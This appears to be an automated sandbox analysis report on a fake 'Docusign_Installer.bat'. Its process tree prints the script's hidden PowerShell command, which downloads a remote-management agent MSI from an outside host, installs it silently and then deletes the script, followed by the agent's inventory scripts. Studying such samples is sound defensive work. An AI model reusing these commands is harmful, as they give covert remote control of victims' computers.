Analysis

  • max time kernel
    92s
  • max time network
    153s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    04/08/2026, 07:08

General

  • Target
    Docusign_Installer.bat
  • Size 1KB
  • Sample260804-hyn3catelf
  • SHA256 3ad57b6dbf81a3af0f8949e380f6790011d8e042abaaa7d3c203565a317bb3c0
  • MD5 SHA1 SHA512 TLSH
Score
8/10

Malware Config

Signatures

  • Badlisted process makes network request 1 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 44 IoCs

    Powershell Invoke Web Request.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 TTPs 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Executes a command shell one-liner 1 TTPs 1 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 21 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Docusign_Installer.bat"
    1⤵
    • Executes a command shell one-liner
    • Suspicious use of WriteProcessMemory
    PID:2836
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:6096
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:1668
      • C:\Windows\system32\reg.exe
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s /f "Action1"
        2⤵
          PID:4088
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -Command "try {Invoke-WebRequest -Uri 'https://app.na-2.action1.com/agent/7fdfa464-7f6a-11f1-b7e6-37df2a619ce9/Windows/agent(My_Organization).msi' -OutFile 'C:\Users\Admin\AppData\Local\Temp\pkg.msi' -ErrorAction Stop} catch {exit 1}"
          2⤵
          • Badlisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3532
        • C:\Windows\system32\msiexec.exe
          msiexec /i "C:\Users\Admin\AppData\Local\Temp\pkg.msi" /qn /norestart
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1948
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -Command "Start-Sleep -Seconds 2; Remove-Item -LiteralPath 'C:\Users\Admin\AppData\Local\Temp\Docusign_Installer.bat' -Force"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Deletes itself
          • Suspicious behavior: EnumeratesProcesses
          PID:900
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe /V
        1⤵
        • Enumerates connected drives
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4232
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding B18BC8CCBC1333F33B5B231D05F0E140
          2⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:6124
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding 6188A6D67DAF38E92CBC112D9AAAB690 E Global\MSI0000
          2⤵
          • Loads dropped DLL
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1084
      • C:\Windows\Action1\action1_agent.exe
        C:\Windows\Action1\action1_agent.exe service
        1⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4272
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "$ExecutionContext.SessionState.LanguageMode"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2628
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\DataSource_1008.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3000
          • C:\Windows\Action1\action1_agent.exe
            "C:\Windows\Action1\action1_agent.exe" loggedonuser
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4100
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\DataSource_1004.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:3452
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\DataSource_1008.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4620
          • C:\Windows\Action1\action1_agent.exe
            "C:\Windows\Action1\action1_agent.exe" loggedonuser
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4696
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\DataSource_1004.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:1920
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Disk Drives_2016-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:5532
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Open Shared Resources_2018-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:4264
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Windows Update Statistics_2039-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:2992
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\SCSI Controllers_2027-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:5812
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Windows 11 Hardware Compatibility_2065-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5224
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\SystemTemp\00jp1z0k\00jp1z0k.cmdline"
            3⤵
            • Drops file in Windows directory
            • Suspicious use of WriteProcessMemory
            PID:4152
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\SystemTemp\RESB2A8.tmp" "c:\Windows\SystemTemp\00jp1z0k\CSC4219D174D5F04FA68F97EFDFBB1F183C.TMP"
              4⤵
              • Drops file in Windows directory
              PID:4868
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\NTFS Disk Quotas_2035-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:4740
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Antivirus Status_2045-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:5356
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Applied GPO x0028RSoPx0029_2022-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:2492
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\System Information_2023-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:2024
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Sound Devices_2038-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:4488
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Connections to TCPx002FIP Addresses_2036-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:980
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Startup Programs_2032-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:2992
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Bitlocker Key_2046-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:5812
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Disk Partitions_2034-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:4224
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Logon Statistics_2013-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:3588
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\WebP Vulnerability Status_2051-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:2732
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Installed Printers_2025-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:3336
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Monitors_2026-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:3400
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\MS Outlook Versions_2043-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:3696
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Windows Services_2033-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:4712
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Windows Update Status_2064-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:5976
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Processx002FMemory Stats_2031-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:1260
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Windows Drivers_2024-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:1272
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Windows Update History_2044-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:2832
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Action1 Agent Configuration_2066-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:3592
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Boot Configurations_2019-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:4740
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Disks Summary_2042-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:548
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Hardware Summary_2037-1784023871.ps1"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          PID:3704
          • C:\Windows\Action1\action1_agent.exe
            "C:\Windows\Action1\action1_agent.exe" loggedonuser
            3⤵
              PID:4248
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Environment Variables_2020-1784023871.ps1"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            PID:3400
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Connections to Internet Domains_2040-1784023871.ps1"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            PID:124
            • C:\Windows\system32\nslookup.exe
              "C:\Windows\system32\nslookup.exe" 134.33.185.96
              3⤵
                PID:1016
              • C:\Windows\system32\nslookup.exe
                "C:\Windows\system32\nslookup.exe" 142.250.151.94
                3⤵
                  PID:1076
                • C:\Windows\system32\nslookup.exe
                  "C:\Windows\system32\nslookup.exe" 199.232.210.172
                  3⤵
                    PID:1084
                  • C:\Windows\system32\nslookup.exe
                    "C:\Windows\system32\nslookup.exe" 44.232.42.159
                    3⤵
                      PID:5524
                    • C:\Windows\system32\nslookup.exe
                      "C:\Windows\system32\nslookup.exe" 93.123.17.252
                      3⤵
                        PID:4992
                      • C:\Windows\system32\nslookup.exe
                        "C:\Windows\system32\nslookup.exe" 57.154.63.210
                        3⤵
                          PID:3472
                        • C:\Windows\system32\nslookup.exe
                          "C:\Windows\system32\nslookup.exe" 23.11.40.157
                          3⤵
                            PID:1948
                          • C:\Windows\system32\nslookup.exe
                            "C:\Windows\system32\nslookup.exe" 199.232.214.172
                            3⤵
                              PID:5840
                            • C:\Windows\system32\nslookup.exe
                              "C:\Windows\system32\nslookup.exe" 20.190.160.22
                              3⤵
                                PID:2564
                              • C:\Windows\system32\nslookup.exe
                                "C:\Windows\system32\nslookup.exe" 10.127.0.1
                                3⤵
                                  PID:5180
                                • C:\Windows\system32\nslookup.exe
                                  "C:\Windows\system32\nslookup.exe" 10.127.0.1
                                  3⤵
                                    PID:2392
                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Windows Updates_2010-1784023871.ps1"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:2368
                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Running Processes_2030-1784023871.ps1"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:2992
                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Network Adapters_2029-1784023871.ps1"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:2380
                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Routing Tables_2028-1784023871.ps1"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:3644
                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\Windows Event Logs_2021-1784023871.ps1"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:4624
                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "C:\Windows\Action1\scripts\MOVEit Vulnerability Status_2050-1784023871.ps1"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:5636

                              Network

                                    MITRE ATT&CK Enterprise v16

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    e5a0573.rbs

                                    • Path C:\Config.Msi\e5a0573.rbs
                                    • Size 240KB
                                    • SHA256 6505ac3f73c70ea98767037d0a331ed6a36a186e05630e37a9a1ac25842760c6
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    e5a0574.rbs

                                    • Path C:\Config.Msi\e5a0574.rbs
                                    • Size 7KB
                                    • SHA256 8648274ad0b7b54cc75cff0cca695ebb66548bee579efbfcfc69fa09deef38a5
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    ModuleAnalysisCache

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                    • Size 67KB
                                    • SHA256 96952b58e7507bfbf6b1edf838d41182ae4f94e983572fa0c037be46d4ab1b05
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 b67191a152d4566d0194395342f55c6142d94005610603fdc92ac4d491519f82
                                    • MD5 SHA1 SHA512 TLSH

                                    __PSScriptPolicyTest_0drvzwoy.fgv.ps1

                                    • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0drvzwoy.fgv.ps1
                                    • Size 60B
                                    • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                    • MD5 SHA1 SHA512 TLSH

                                    pkg.msi

                                    • Path C:\Users\Admin\AppData\Local\Temp\pkg.msi
                                    • Size 6.8MB
                                    • SHA256 66debf86917df83671d18099230da8593f2a6368af6c81ed3987f95ea99db0c8
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    action1_agent.exe

                                    • Path C:\Windows\Action1\action1_agent.exe
                                    • Size 8.9MB
                                    • SHA256 941695d20d82dd5d62f74b0111feb23720637202f6c797df2a02e2cb6cb6e8e3
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    advanced_settings.json

                                    • Path C:\Windows\Action1\advanced_settings.json
                                    • Size 54KB
                                    • SHA256 ca0bc1de29f71ed30e1a0a4e08b66373cdf0a13dc3a0fddf5cb3efda2883550c
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    agent_downgrade.version_pair

                                    • Path C:\Windows\Action1\agent_downgrade.version_pair
                                    • Size 81B
                                    • SHA256 59ce9944f3204dc78713668b9d92f9058124261d341ad59070318df817d6479a
                                    • MD5 SHA1 SHA512 TLSH

                                    previousUser.txt

                                    • Path C:\Windows\Action1\previousUser.txt
                                    • Size 14B
                                    • SHA256 fc2692a21a976d784353d63b6eb3cb2a8d6be25e4ee40faa14fd9e7377b6902d
                                    • MD5 SHA1 SHA512

                                    Antivirus Status_2045-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Antivirus Status_2045-1784023871.ps1
                                    • Size 8KB
                                    • SHA256 2dedbee95a396f781f4ca445d1f59f378d4eb4e48ac13763d6c1471e94805ea2
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    Applied GPO x0028RSoPx0029_2022-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Applied GPO x0028RSoPx0029_2022-1784023871.ps1
                                    • Size 1KB
                                    • SHA256 fb15d938a3164caaad5c3fec79b8bf4c64a19dd0f7d9c064f5fe2f84d5784550
                                    • MD5 SHA1 SHA512 TLSH

                                    Bitlocker Key_2046-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Bitlocker Key_2046-1784023871.ps1
                                    • Size 1KB
                                    • SHA256 c3b643ee4f71266cefd816afb4584d260a06d60da5b518f5b907ca61d3faca70
                                    • MD5 SHA1 SHA512 TLSH

                                    Connections to TCPx002FIP Addresses_2036-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Connections to TCPx002FIP Addresses_2036-1784023871.ps1
                                    • Size 3KB
                                    • SHA256 ac67be5c69d9e70e4e93b92dbfe5f6a67cf0de44b22504fb3a4d9968ddfcaa09
                                    • MD5 SHA1 SHA512 TLSH

                                    DataSource_1004.ps1

                                    • Path C:\Windows\Action1\scripts\DataSource_1004.ps1
                                    • Size 55KB
                                    • SHA256 3c0ea3f83d6ebfdbd36de8df82fca5524f1954bba51485f0590857b62ef6eb2f
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    DataSource_1008.ps1

                                    • Path C:\Windows\Action1\scripts\DataSource_1008.ps1
                                    • Size 20KB
                                    • SHA256 6ca8873bf46ea4888dce7ab5ccdaba1e34577ce8cc1064817d66a3cd901351ea
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    Disk Drives_2016-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Disk Drives_2016-1784023871.ps1
                                    • Size 2KB
                                    • SHA256 47cc596b35474127d09dfb363be83c663c3497d39ffa249f7e0ee33ee8340586
                                    • MD5 SHA1 SHA512 TLSH

                                    Disk Partitions_2034-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Disk Partitions_2034-1784023871.ps1
                                    • Size 1KB
                                    • SHA256 fe0308174099c26f057e8aeca6f0399e5127d173f42f7567a4af789a40fb569c
                                    • MD5 SHA1 SHA512 TLSH

                                    Installed Printers_2025-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Installed Printers_2025-1784023871.ps1
                                    • Size 1KB
                                    • SHA256 b558869c41920db3bd3af0e204149ff735402e376c5e5127a676f2453620e608
                                    • MD5 SHA1 SHA512 TLSH

                                    Logon Statistics_2013-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Logon Statistics_2013-1784023871.ps1
                                    • Size 1KB
                                    • SHA256 f93367161b4ac72d585677b4db920a4e2e3de702e9e25a90256854a824f52cb2
                                    • MD5 SHA1 SHA512 TLSH

                                    Monitors_2026-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Monitors_2026-1784023871.ps1
                                    • Size 1KB
                                    • SHA256 ec02022539fc99fa918ab77b05941d73f0675476d60a7737c46c05471e95e5ae
                                    • MD5 SHA1 SHA512 TLSH

                                    NTFS Disk Quotas_2035-1784023871.ps1

